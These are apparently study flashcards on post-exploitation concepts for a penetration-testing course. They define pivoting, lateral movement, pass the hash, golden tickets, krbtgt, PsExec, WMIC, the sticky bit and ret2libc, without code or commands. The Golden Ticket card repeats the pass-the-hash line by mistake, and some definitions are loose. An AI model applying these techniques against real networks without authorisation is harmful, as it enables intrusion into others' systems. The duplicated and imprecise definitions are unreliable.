Section 15: Post-Exploitation Flashcards
Pivoting vs Lateral Movement
Lateral Movement
▪ A technique to progressively move through a network to search for the key data and assets that are ultimately the target of an attack campaign
Pivoting
▪ The use of one infected computer to attack a different computer
▪ Pivoting uses the compromised system to attack other systems on the same network to avoid restrictions such as firewall configurations
Pass the Hash
While a pass the hash attack will work on local workstations, a Kerberos ticket is needed in an Active Directory environment
Golden Ticket
While a pass the hash attack will work on local workstations, a Kerberos ticket is needed in an Active Directory environment
A Kerberos ticket that can grant other tickets in an Active Directory
environment
▪ Golden tickets can grant administrative access to other domains
members and domain controllers
krbtgt hash
The trust anchor of the Active Directory domain which functions like a private key of a root certificate authority and generates ticket-granting tickets (TGT) that are used by users to access services within Kerberos
Windows Management Instrumentation Command-Line (WMIC)
Provides users with a terminal interface and enables administrators to run scripts to manage those computers
PsExec
A tool developed as an alternative to Telnet and other remote access services which utilizes the Windows SYSTEM account for privilege escalation
Sticky Bit
Regular behavior: In a normal directory, any user who has write permissions to that directory can create, modify, or delete files within it.
Sticky bit behavior: When the sticky bit is set on a directory, only the owner of a file within that directory (or the system administrator) can delete or rename that file, even if other users have write permissions to the directory.
Think of the sticky bit as a kind of “protection” for the files inside a shared directory. It ensures that each user can manage their own files, but they cannot accidentally or intentionally delete or modify files owned by other users. This is commonly used in shared directories, like the /tmp directory on Unix-like systems, to prevent users from deleting or modifying each other’s temporary files.
In summary, the sticky bit is a permission that allows users to work collaboratively in a shared directory while protecting the ownership and integrity of individual files within that directory.
Ret2libc
A privilege escalation attack technique that relies on overwriting the program stack to create a new stack frame that calls the system function
